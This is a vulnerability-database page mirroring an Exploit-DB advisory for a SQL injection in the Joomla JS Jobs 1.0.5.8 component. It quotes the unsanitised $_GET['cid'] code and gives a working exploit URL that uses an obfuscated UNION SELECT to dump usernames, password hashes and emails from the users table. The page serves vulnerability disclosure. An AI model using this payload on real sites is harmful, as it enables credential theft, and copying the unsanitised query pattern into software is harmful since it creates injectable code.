Lucene search
+L

Joomla! Component JS Jobs 1.0.5.8 - SQL Injection

🗓️ 31 May 2010 00:00:00Reported by d0lc3Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Joomla! Component JS Jobs 1.0.5.8 SQL Injection on View.html.ph

Related
Code
ReporterTitlePublishedViews
Family
checkpoint_advisories
Check Point Advisories
Joomla Component com_jsjobs SQL Injection (CVE-2009-4599)
10 Nov 201400:00
checkpoint_advisories
cve
CVE
CVE-2009-4599
12 Jan 201017:00
cve
cvelist
Cvelist
CVE-2009-4599
12 Jan 201017:00
cvelist
exploitdb
Exploit DB
Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection
10 Dec 200900:00
exploitdb
euvd
EUVD
EUVD-2009-4565
7 Oct 202500:30
euvd
nessus
Tenable Nessus
JS Jobs Component for Joomla! 'md' Parameter SQLi
11 Jan 201000:00
nessus
nvd
NVD
CVE-2009-4599
12 Jan 201017:30
nvd
prion
Prion
Sql injection
12 Jan 201017:30
prion
# Exploit Title:	Joomla Component com_jsjobs SQL Injection Vulnerability

#Date:			31/05/10

#Author:		http://www.joomsky.com

#Software Link:		http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23%3Ajs-jobs&Itemid=4

#Version:		1.0.5.8

#Tested on:		Linux ubuntu32 2.6.32-22-generic x64

#Summary:

On administrator/components/com_jsjobs/views/application/view.html.php file we can find this segment code on line 53:

if ($cur_layout == 'categories'){
			if (isset($_GET['cid'][0])) 	$c_id= $_GET['cid'][0];	//o0ps..possible SQL Injection }:)
			else $c_id='';

			if ($c_id == ''){
				$cids = JRequest :: getVar('cid', array (0), 'post', 'array');
				$c_id= $cids[0];
			}

		...	//conditional check some values with elseifs...
}

This check
	if (isset($_GET['cid'][0])) 	$c_id= $_GET['cid'][0];
open SQLi posibilities for get sense information from servers databases. Some like this:

[+]EXPLOIT:
http://localhost/joomla/administrator/index.php?option=com_jsjobs&task=edit&cid[]=-69/*!union/**/select/**/1,2,3,group_concat%28username,0x3a,password,0x3a,email%29/**/from/**/jos_users*/--


by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Dec 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.02007
36